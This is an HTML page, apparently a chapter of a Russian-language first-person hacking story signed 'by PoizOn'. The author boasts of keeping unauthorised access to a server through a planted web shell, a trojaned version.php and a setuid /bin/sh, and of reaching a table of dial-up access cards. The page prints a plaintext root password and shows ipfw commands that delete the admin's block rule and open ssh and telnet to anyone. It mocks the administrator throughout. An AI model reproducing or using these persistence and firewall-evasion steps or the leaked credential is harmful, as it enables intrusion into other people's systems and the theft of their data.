      <p class="style3">&#1041;&#1091;&#1082;&#1074;&#1072;&#1083;&#1100;&#1085;&#1086; &#1085;&#1072; &#1089;&#1083;&#1077;&#1076;&#1091;&#1102;&#1097;&#1080;&#1081; &#1076;&#1077;&#1085;&#1100;, &#1084;&#1099; &#1086;&#1073;&#1085;&#1072;&#1088;&#1091;&#1078;&#1080;&#1083;&#1080; &#1095;&#1090;&#1086; &#1074;&#1101;&#1073;-&#1096;&#1077;&#1083;&#1083; &#1089;&#1076;&#1077;&#1083;&#1072;&#1085;&#1085;&#1099;&#1081; &#1095;&#1077;&#1088;&#1077;&#1079; &#1096;&#1072;&#1073;&#1083;&#1086;&#1085;&#1099;, &#1087;&#1086; &#1087;&#1088;&#1077;&#1078;&#1085;&#1077;&#1084;&#1091; &#1085;&#1072; &#1084;&#1077;&#1089;&#1090;&#1077;. &#1055;&#1088;&#1086;&#1080;&#1075;&#1088;&#1072;&#1085;&#1085;&#1072;&#1103; &#1073;&#1080;&#1090;&#1074;&#1072; &#1072;&#1076;&#1084;&#1080;&#1085;&#1091; &#1076;&#1072;&#1074;&#1080;&#1083;&#1072; &#1085;&#1072; &#1089;&#1072;&#1084;&#1086;&#1083;&#1102;&#1073;&#1080;&#1077;, &#1080; &#1084;&#1099; &#1089;&#1085;&#1086;&#1074;&#1072; &#1074;&#1099;&#1083;&#1077;&#1079;&#1083;&#1080; &#1085;&#1072; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;. &#1057;&#1085;&#1086;&#1074;&#1072; &#1082;&#1086;&#1085;&#1085;&#1077;&#1082;&#1090; &#1082; &#1073;&#1072;&#1079;&#1077; &#1076;&#1072;&#1085;&#1085;&#1099;&#1093;, &#1088;&#1091;&#1090;&#1086;&#1074;&#1099;&#1081; &#1087;&#1072;&#1088;&#1086;&#1083;&#1100; &#1085;&#1072; &#1073;&#1072;&#1079;&#1091; &#1085;&#1077; &#1089;&#1084;&#1077;&#1085;&#1077;&#1085;... &#1069;&#1090;&#1086; &#1093;&#1086;&#1088;&#1086;&#1096;&#1086;.. &#1055;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088;&#1077;&#1074; &#1088;&#1072;&#1079;&#1085;&#1099;&#1077; &#1090;&#1072;&#1073;&#1083;&#1080;&#1094;&#1099;, &#1086;&#1073;&#1085;&#1072;&#1088;&#1091;&#1078;&#1080;&#1083;&#1080; &#1085;&#1077;&#1089;&#1082;&#1086;&#1083;&#1100;&#1082;&#1086; &#1080;&#1085;&#1090;&#1077;&#1088;&#1077;&#1089;&#1085;&#1099;&#1093;, &#1074; &#1090;&#1086;&#1084; &#1095;&#1080;&#1089;&#1083;&#1077; &#1073;&#1072;&#1079;&#1072; &#1082;&#1072;&#1088;&#1090;&#1086;&#1095;&#1077;&#1082; &#1076;&#1083;&#1103; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087;&#1072; &#1074; &#1080;&#1085;&#1077;&#1090; &#1087;&#1086; &#1076;&#1080;&#1072;&#1083;&#1072;&#1087;&#1091;. &#1051;&#1080;&#1096;&#1100; &#1085;&#1077;&#1082;&#1086;&#1090;&#1086;&#1088;&#1099;&#1077; &#1080;&#1079; &#1085;&#1080;&#1093; &#1073;&#1099;&#1083;&#1080; &#1072;&#1082;&#1090;&#1080;&#1074;&#1080;&#1088;&#1086;&#1074;&#1072;&#1085;&#1099;.</p>
      <p align="center"><img src="img/3-uz.gif" width="600" height="126" border="1"></p>
      <p align="left" class="style3">&#1053;&#1086; &#1101;&#1090;&#1086; &#1073;&#1099;&#1083;&#1086; &#1085;&#1077; &#1089;&#1072;&#1084;&#1086;&#1077; &#1080;&#1085;&#1090;&#1077;&#1088;&#1077;&#1089;&#1085;&#1086;&#1077; &#1074; &#1073;&#1072;&#1079;&#1077;. &#1058;&#1072;&#1084; &#1073;&#1099;&#1083;&#1072; &#1077;&#1097;&#1077; &#1086;&#1076;&#1085;&#1072; &#1090;&#1072;&#1073;&#1083;&#1080;&#1094;&#1072;:</p>
      <p align="center"><img src="img/4-uz.gif" width="600" height="126" border="1"> </p>
      <p align="left" class="style3">&#1050;&#1072;&#1082; &#1074;&#1080;&#1076;&#1080;&#1090;&#1077; - &#1077;&#1089;&#1083;&#1080; &#1089;&#1072;&#1084;&#1099;&#1077; &#1089;&#1083;&#1086;&#1078;&#1085;&#1099;&#1077; &#1087;&#1072;&#1088;&#1086;&#1083;&#1080; &#1093;&#1088;&#1072;&#1085;&#1103;&#1090;&#1089;&#1103; &#1074; &#1086;&#1090;&#1082;&#1088;&#1099;&#1090;&#1086;&#1084; &#1074;&#1080;&#1076;&#1077; - &#1090;&#1086;&#1083;&#1082;&#1091; &#1086;&#1090; &#1085;&#1080;&#1093; &#1084;&#1072;&#1083;&#1086;... &#1055;&#1077;&#1088;&#1074;&#1099;&#1077; &#1076;&#1074;&#1072; &#1087;&#1072;&#1089;&#1089;&#1072; &#1076;&#1083;&#1103; &#1102;&#1079;&#1077;&#1088;&#1086;&#1074; alf &#1080; dsi &#1087;&#1086;&#1076;&#1093;&#1086;&#1076;&#1080;&#1083;&#1080; &#1076;&#1083;&#1103; &#1092;&#1090;&#1087;, &#1093;&#1086;&#1090;&#1100; &#1080; &#1085;&#1077; &#1073;&#1099;&#1083;&#1080; &#1072;&#1076;&#1084;&#1080;&#1085;&#1089;&#1082;&#1080;&#1084;&#1080;. &#1063;&#1077;&#1088;&#1077;&#1079; &#1102;&#1079;&#1077;&#1088;&#1072; dsi &#1084;&#1099; &#1079;&#1072;&#1090;&#1088;&#1086;&#1103;&#1085;&#1080;&#1083;&#1080; &#1089;&#1082;&#1088;&#1080;&#1087;&#1090; version.php, &#1095;&#1090;&#1086;&#1073;&#1099; &#1088;&#1072;&#1073;&#1086;&#1090;&#1072;&#1090;&#1100; &#1095;&#1077;&#1088;&#1077;&#1079; &#1085;&#1077;&#1075;&#1086; - &#1087;&#1088;&#1086;&#1089;&#1090;&#1086; &#1090;&#1072;&#1082; &#1091;&#1076;&#1086;&#1073;&#1085;&#1077;&#1077; &#1073;&#1099;&#1083;&#1086;, &#1095;&#1077;&#1084; &#1102;&#1079;&#1072;&#1090;&#1100; &#1082;&#1088;&#1080;&#1074;&#1086;&#1074;&#1072;&#1090;&#1099;&#1081; &#1096;&#1077;&#1083;&#1083; &#1095;&#1077;&#1088;&#1077;&#1079; &#1096;&#1072;&#1073;&#1083;&#1086;&#1085;. &#1050; &#1089;&#1083;&#1086;&#1074;&#1091; &#1089;&#1082;&#1072;&#1079;&#1072;&#1090;&#1100; &#1089;&#1091;&#1080;&#1076;&#1085;&#1099;&#1081; &#1073;&#1080;&#1090; &#1089; /bin/sh &#1084;&#1099; &#1089;&#1085;&#1103;&#1083;&#1080; &#1077;&#1097;&#1077; &#1074; &#1087;&#1077;&#1088;&#1074;&#1099;&#1081; &#1088;&#1072;&#1079;, &#1087;&#1086;&#1101;&#1090;&#1086;&#1084;&#1091; &#1087;&#1088;&#1072;&#1074; &#1091; &#1085;&#1072;&#1089; &#1085;&#1077; &#1073;&#1099;&#1083;&#1086; &#1085;&#1080;&#1082;&#1072;&#1082;&#1080;&#1093; .. &#1086;&#1087;&#1103;&#1090;&#1100;.. &#1052;&#1099; &#1087;&#1086;&#1076;&#1086;&#1078;&#1076;&#1072;&#1083;&#1080; &#1082;&#1086;&#1075;&#1076;&#1072; &#1072;&#1076;&#1084;&#1080;&#1085; &#1091;&#1081;&#1076;&#1077;&#1090; &#1089; &#1096;&#1077;&#1083;&#1083;&#1072; (&#1086;&#1085; &#1090;&#1086;&#1088;&#1095;&#1072;&#1083; &#1090;&#1072;&#1084; &#1089; &#1089;&#1072;&#1084;&#1086;&#1075;&#1086; &#1091;&#1090;&#1088;&#1072;), &#1080; &#1087;&#1088;&#1080;&#1085;&#1103;&#1083;&#1080;&#1089;&#1100; &#1079;&#1072; &#1088;&#1072;&#1073;&#1086;&#1090;&#1091;. &#1057;&#1085;&#1086;&#1074;&#1072; &#1079;&#1072;&#1083;&#1080;&#1083;&#1080; &#1088;&#1077;&#1084;&#1074;&#1100;&#1102;, &#1080; &#1074; &#1086;&#1076;&#1085;&#1086;&#1084; &#1073;&#1072;&#1096;&#1077;&#1074;&#1086;&#1084; &#1092;&#1072;&#1081;&#1083;&#1080;&#1082;&#1077; &#1089;&#1085;&#1086;&#1074;&#1072; &#1085;&#1072;&#1096;&#1083;&#1080; &#1087;&#1072;&#1089;&#1089; &#1076;&#1083;&#1103; &#1088;&#1091;&#1090;&#1072;, &#1090;&#1077;&#1087;&#1077;&#1088;&#1100; &#1086;&#1085; &#1073;&#1099;&#1083; &#1077;&#1097;&#1077; &#1073;&#1086;&#1083;&#1077;&#1077; &#1085;&#1072;&#1074;&#1086;&#1088;&#1086;&#1095;&#1077;&#1085;&#1085;&#1099;&#1084; - Hei8sheezo . &#1053;&#1086; &#1089;&#1083;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1100; &#1087;&#1072;&#1088;&#1086;&#1083;&#1103; &#1085;&#1077; &#1089;&#1087;&#1072;&#1089;&#1083;&#1072; &#1077;&#1075;&#1086;.... &#1054;&#1087;&#1103;&#1090;&#1100; &#1082;&#1086;&#1085;&#1085;&#1077;&#1082;&#1090; &#1085;&#1072; &#1092;&#1090;&#1087; (&#1086;&#1087;&#1103;&#1090;&#1100; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087; &#1076;&#1083;&#1103; &#1088;&#1091;&#1090;&#1072; &#1086;&#1090;&#1082;&#1088;&#1099;&#1090; &#1085;&#1072; &#1092;&#1090;&#1087;)</p>
      <p align="center"><img src="img/5-uz.gif" width="548" height="192" border="1"> </p>
      <p align="left" class="style3">&#1052;&#1099; &#1087;&#1088;&#1080;&#1089;&#1090;&#1091;&#1087;&#1080;&#1083;&#1080; &#1082; &#1087;&#1086;&#1074;&#1090;&#1086;&#1088;&#1077;&#1085;&#1080;&#1102; &#1087;&#1088;&#1086;&#1081;&#1076;&#1077;&#1085;&#1085;&#1086;&#1075;&#1086;.. &#1056;&#1091;&#1083;&#1077;&#1089;&#1099; &#1072;&#1076;&#1084;&#1080;&#1085; &#1080;&#1079;&#1084;&#1077;&#1085;&#1080;&#1083;, &#1076;&#1086;&#1073;&#1072;&#1074;&#1080;&#1074; &#1087;&#1088;&#1072;&#1074;&#1080;&#1083;&#1086;:</p>
      <p align="left" class="style3">00100 27 1620 deny ip from xx.x.x.x to any</p>
      <p align="left" class="style3">&#1071; &#1076;&#1091;&#1084;&#1072;&#1102; &#1074;&#1072;&#1084; &#1087;&#1086;&#1085;&#1103;&#1090;&#1085;&#1086; &#1095;&#1090;&#1086; &#1101;&#1090;&#1086; &#1079;&#1072; &#1087;&#1088;&#1072;&#1074;&#1080;&#1083;&#1086;.. &#1047;&#1072;&#1084;&#1077;&#1089;&#1090;&#1086; &#1090;&#1086;&#1075;&#1086; &#1095;&#1090;&#1086;&#1073;&#1099; &#1089;&#1077;&#1088;&#1100;&#1077;&#1079;&#1085;&#1086; &#1087;&#1086;&#1073;&#1077;&#1089;&#1087;&#1086;&#1082;&#1086;&#1080;&#1090;&#1089;&#1103; &#1086; &#1079;&#1072;&#1097;&#1080;&#1090;&#1077; - &#1086;&#1085; &#1073;&#1083;&#1086;&#1082;&#1080;&#1088;&#1086;&#1074;&#1072;&#1083; &#1085;&#1072;&#1096; shell, &#1082;&#1086;&#1090;&#1086;&#1088;&#1099;&#1081; &#1073;&#1099;&#1083; &#1077;&#1089;&#1090;&#1077;&#1089;&#1089;&#1085;&#1086; &#1085;&#1077; &#1086;&#1076;&#1080;&#1085; :). </p>
      <p align="left" class="style3">&#1053;&#1086; &#1090;&#1077;&#1087;&#1077;&#1088;&#1100; &#1089; &#1088;&#1077;&#1089;&#1090;&#1072;&#1088;&#1090;&#1086;&#1084; IPFW &#1073;&#1099;&#1083; &#1075;&#1086;&#1083;&#1103;&#1082;, &#1092;&#1072;&#1101;&#1088; &#1085;&#1077; &#1093;&#1086;&#1090;&#1077;&#1083; &#1087;&#1088;&#1080;&#1084;&#1077;&#1085;&#1103;&#1090;&#1100; &#1087;&#1088;&#1072;&#1074;&#1080;&#1083;&#1072;. &#1055;&#1088;&#1080;&#1096;&#1083;&#1086;&#1089;&#1100; &#1089;&#1085;&#1086;&#1074;&#1072; &#1087;&#1088;&#1086;&#1089;&#1090;&#1072;&#1074;&#1080;&#1090;&#1100; &#1085;&#1072; /bin/sh &#1089;&#1091;&#1080;&#1076;&#1085;&#1099;&#1081; &#1073;&#1080;&#1090;, &#1080; &#1088;&#1072;&#1073;&#1086;&#1090;&#1072;&#1090;&#1100; &#1095;&#1077;&#1088;&#1077;&#1079; &#1073;&#1088;&#1086;&#1091;&#1079;&#1077;&#1088; :-). &#1052;&#1099; &#1088;&#1077;&#1096;&#1080;&#1083;&#1080; &#1085;&#1072; &#1083;&#1077;&#1090;&#1091; &#1091;&#1076;&#1072;&#1083;&#1080;&#1090;&#1100; &#1083;&#1080;&#1096;&#1085;&#1080;&#1077; &#1088;&#1091;&#1083;&#1077;&#1089;&#1099; &#1080; &#1085;&#1077; &#1076;&#1086;&#1073;&#1072;&#1074;&#1083;&#1103;&#1090;&#1100; &#1085;&#1086;&#1074;&#1099;&#1077; - &#1072; &#1080;&#1079;&#1084;&#1077;&#1085;&#1080;&#1090;&#1100; &#1086;&#1076;&#1085;&#1086; &#1089;&#1090;&#1072;&#1088;&#1086;&#1077;... </p>
      <p align="left" class="style3">ipfw -q delete 100</p>
      <p align="left" class="style3">&#1089;&#1085;&#1077;&#1089;&#1083;&#1072; &#1079;&#1072;&#1087;&#1088;&#1077;&#1090; &#1085;&#1072; &#1082;&#1086;&#1085;&#1085;&#1077;&#1082;&#1090; &#1089; &#1085;&#1072;&#1096;&#1077;&#1075;&#1086; &#1096;&#1077;&#1083;&#1083;&#1072;.</p>
      <p align="left" class="style3">ipfw -q delete 6300</p>
      <p align="left" class="style3">ipfw -q add allow tcp from any to any ssh, telnet</p>
      <p align="left" class="style3">&#1101;&#1090;&#1080; &#1087;&#1088;&#1072;&#1074;&#1080;&#1083;&#1072; &#1076;&#1072;&#1083;&#1080; &#1085;&#1072;&#1084; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1100; &#1082;&#1086;&#1085;&#1085;&#1077;&#1082;&#1090;&#1072;... &#1085;&#1086;&#1086;&#1086;...!!! &#1084;&#1099; &#1095;&#1077;&#1082;&#1072;&#1083;&#1080; &#1087;&#1088;&#1080;&#1084;&#1077;&#1085;&#1077;&#1085;&#1080;&#1077; &#1087;&#1088;&#1072;&#1074;&#1080;&#1083; &#1095;&#1077;&#1088;&#1077;&#1079; &#1087;&#1088;&#1086;&#1084;&#1077;&#1078;&#1091;&#1090;&#1086;&#1095;&#1085;&#1099;&#1081; &#1092;&#1072;&#1081;&#1083; &#1080; &#1095;&#1077;&#1088;&#1077;&#1079; &#1074;&#1101;&#1073;-&#1096;&#1077;&#1083;&#1083; &#1074; &#1092;&#1072;&#1081;&#1083;&#1077; version.php, &#1080; &#1090;&#1091;&#1090; &#1101;&#1090;&#1086;&#1090; &#1092;&#1072;&#1081;&#1083; &#1087;&#1077;&#1088;&#1077;&#1089;&#1090;&#1072;&#1083; &#1086;&#1090;&#1074;&#1077;&#1095;&#1072;&#1090;&#1100;... &#1040;&#1076;&#1084;&#1080;&#1085; &#1089;&#1085;&#1086;&#1074;&#1072; &#1085;&#1072;&#1089; &#1087;&#1086;&#1087;&#1072;&#1083;&#1080;&#1083; &#1082;&#1086;&#1075;&#1076;&#1072; &#1084;&#1099; &#1084;&#1077;&#1085;&#1103;&#1083;&#1080; &#1088;&#1091;&#1083;&#1077;&#1089;&#1099;... &#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1080;&#1074; &#1087;&#1088;&#1080;&#1089;&#1091;&#1090;&#1089;&#1090;&#1074;&#1080;&#1077; &#1072;&#1076;&#1084;&#1080;&#1085;&#1072; &#1085;&#1072; &#1096;&#1077;&#1083;&#1083;&#1077; &#1095;&#1077;&#1088;&#1077;&#1079; &#1090;&#1088;&#1086;&#1103;&#1085;&#1077;&#1085;&#1085;&#1099;&#1081; &#1096;&#1072;&#1073;&#1083;&#1086;&#1085; - &#1084;&#1099; &#1087;&#1086;&#1085;&#1103;&#1083;&#1080; &#1095;&#1090;&#1086; &#1086;&#1085; &#1090;&#1086;&#1083;&#1100;&#1082;&#1086; &#1095;&#1090;&#1086; &#1087;&#1086;&#1103;&#1074;&#1080;&#1083;&#1089;&#1103; &#1080; &#1089;&#1088;&#1072;&#1079;&#1091; &#1085;&#1072;&#1089; &#1079;&#1072;&#1089;&#1077;&#1082;.</p>
      <p align="center"><img src="img/6-uz.gif" width="600" height="321" border="1"> </p>
      <p align="left" class="style3">&#1052;&#1099; &#1087;&#1088;&#1086;&#1089;&#1090;&#1086; &#1074;&#1079;&#1073;&#1077;&#1089;&#1080;&#1083;&#1080;&#1089;&#1100; &#1086;&#1090; &#1077;&#1075;&#1086; &#1090;&#1091;&#1087;&#1080;&#1079;&#1084;&#1072;.. &#1061;&#1086;&#1090;&#1103; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086; &#1080; &#1073;&#1099;&#1083;&#1080; &#1085;&#1077; &#1087;&#1088;&#1072;&#1074;&#1099;...</p>
      <p align="left" class="style3">&#1053;&#1086; &#1089;&#1083;&#1077;&#1076;&#1091;&#1102;&#1097;&#1080;&#1081; &#1089;&#1082;&#1088;&#1080;&#1085; &#1074;&#1089;&#1077; &#1089;&#1082;&#1072;&#1078;&#1077;&#1090; &#1089;&#1072;&#1084; &#1079;&#1072; &#1089;&#1077;&#1073;&#1103;.</p>
      <p align="center"><img src="img/7-uz.gif" width="574" height="261" border="1"> </p>
      <p align="left" class="style3">&#1048; &#1073;&#1088;&#1086;&#1091;&#1079;&#1077;&#1088; &#1079;&#1072;&#1074;&#1080;&#1089; &#1074; &#1085;&#1077;&#1076;&#1086;&#1091;&#1084;&#1077;&#1085;&#1080;&#1080;... &#1040; &#1072;&#1076;&#1084;&#1080;&#1085; &#1089;&#1082;&#1086;&#1088;&#1077;&#1077; &#1074;&#1089;&#1077;&#1075;&#1086; &#1074; &#1086;&#1094;&#1077;&#1087;&#1077;&#1085;&#1077;&#1085;&#1080;&#1080;... BlackHatz For3v3r!!! </p>
      <p class="style3">&#1042;&#1086;&#1090; &#1090;&#1072;&#1082;&#1072;&#1103; &#1074;&#1086;&#1090; &#1080;&#1089;&#1090;&#1086;&#1088;&#1080;&#1103;. &#1103; &#1076;&#1091;&#1084;&#1072;&#1102; &#1073;&#1077;&#1079; &#1076;&#1086;&#1087;&#1086;&#1083;&#1085;&#1080;&#1090;&#1077;&#1083;&#1100;&#1085;&#1099;&#1093; &#1087;&#1086;&#1103;&#1089;&#1085;&#1077;&#1085;&#1080;&#1081; &#1103;&#1089;&#1085;&#1086; &#1075;&#1076;&#1077; &#1086;&#1096;&#1080;&#1073;&#1089;&#1103; &#1072;&#1076;&#1084;&#1080;&#1085;. &#1043;&#1083;&#1072;&#1074;&#1085;&#1072;&#1103; &#1086;&#1096;&#1080;&#1073;&#1082;&#1072; - &#1093;&#1088;&#1072;&#1085;&#1077;&#1085;&#1080;&#1077; &#1087;&#1072;&#1088;&#1086;&#1083;&#1103; root&#39;a &#1074; &#1089;&#1082;&#1088;&#1080;&#1087;&#1090;&#1072;&#1093; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087;&#1085;&#1099;&#1093; &#1082; &#1087;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088;&#1091;. &#1042;&#1090;&#1086;&#1088;&#1072;&#1103; &#1086;&#1096;&#1080;&#1073;&#1082;&#1072; - &#1088;&#1072;&#1079;&#1088;&#1077;&#1096;&#1077;&#1085;&#1085;&#1099;&#1081; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087; &#1076;&#1083;&#1103; &#1088;&#1091;&#1090;&#1072; &#1087;&#1086; &#1092;&#1090;&#1087; &#1080; &#1089;&#1089;&#1096;.<br>
&#1050;&#1072;&#1082; &#1074;&#1080;&#1076;&#1080;&#1090;&#1077; &#1076;&#1072;&#1078;&#1077; &#1084;&#1072;&#1089;&#1089;&#1072; &#1087;&#1088;&#1072;&#1074;&#1080;&#1083; &#1092;&#1072;&#1101;&#1088;&#1074;&#1086;&#1083;&#1072; &#1085;&#1077; &#1074;&#1089;&#1077;&#1075;&#1076;&#1072; &#1089;&#1087;&#1072;&#1089;&#1072;&#1102;&#1090; &#1086;&#1090; &#1087;&#1088;&#1086;&#1085;&#1080;&#1082;&#1085;&#1086;&#1074;&#1077;&#1085;&#1080;&#1103;. <br>
&#1053;&#1091; &#1095;&#1090;&#1086; &#1078;, &#1076;&#1091;&#1084;&#1072;&#1102; &#1101;&#1090;&#1086;&#1090; &#1087;&#1088;&#1080;&#1084;&#1077;&#1088; &#1073;&#1091;&#1076;&#1077;&#1090; &#1087;&#1086;&#1091;&#1095;&#1080;&#1090;&#1077;&#1083;&#1077;&#1085;, &#1093;&#1086;&#1090;&#1103; &#1086;&#1085; &#1080; &#1089;&#1090;&#1086;&#1083;&#1100; &#1078;&#1077;&#1089;&#1090;&#1086;&#1082;&#1086; &#1079;&#1072;&#1082;&#1086;&#1085;&#1095;&#1080;&#1083;&#1089;&#1103;.</p>
      <p class="style3"> &#1059;&#1076;&#1072;&#1095;&#33;</p>
      <p><br>
      </p></td>
    <td width="150">&nbsp;</td>
  </tr>
  <tr>
    <td width="150">&nbsp;</td>
    <td width="600">&nbsp;</td>
    <td width="150">&nbsp;</td>
  </tr>
  <tr>
    <td width="150">&nbsp;</td>
    <td width="600">&nbsp;</td>
    <td width="150">&nbsp;</td>
  </tr>
  <tr>
    <td width="150" bgcolor="#CCCCCC"><div align="center"><a href="stat_05.htm" target="_self"><img src="img/strelka-back.gif" alt="&#1053;&#1072;&#1079;&#1072;&#1076;" width="50" height="30" border="0"></a></div></td>
    <td width="600"> <div align="center" class="style2">by PoizOn </div></td>
    <td width="150" bgcolor="#CCCCCC"><div align="center">
    <div align="center"><a href="stat_07.htm"><img src="img/strelka-fw.gif" alt="&#1042;&#1087;&#1077;&#1088;&#1077;&#1076;" width="50" height="30" border="0" align="middle"></a></div></td>
  </tr>
  <tr>
    <td width="150">&nbsp;</td>
    <td width="600">&nbsp;</td>
    <td width="150">&nbsp;</td>
  </tr>
</table>
</body>
</html>
